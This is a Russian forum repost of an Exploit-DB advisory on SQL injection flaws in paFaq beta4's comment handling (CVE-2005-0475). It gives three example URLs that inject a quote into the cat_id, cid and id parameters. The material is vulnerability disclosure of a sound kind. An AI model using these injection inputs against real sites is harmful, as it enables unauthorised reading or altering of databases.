Exploit paFaq beta4 - 'comment.php' Multiple SQL Injections

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
25117
Проверка EDB
  1. Пройдено
Автор
PI3CH
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2005-0475
Дата публикации
2005-02-17
Код:
source: https://www.securityfocus.com/bid/12582/info
  
paFaq is reportedly affected by an SQL injection vulnerability. This issue exists because the application fails to properly sanitize user-supplied input before using it in SQL queries.
  
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
  
This vulnerability is reported to affect paFaq beta4; earlier versions may also be affected. 

http://www.example.com/index.php?act=Speak&code=05&poster=1&name=2&question=3&email=4&cat_id='
http://www.example.com/index.php?act=Speak&code=02&cid='&id=1&poster=1&name=2&answer=3&email=4
http://www.example.com/index.php?act=Speak&code=02&cid=1&id='&poster=1&name=2&answer=3&email=4
 
Источник
www.exploit-db.com

Похожие темы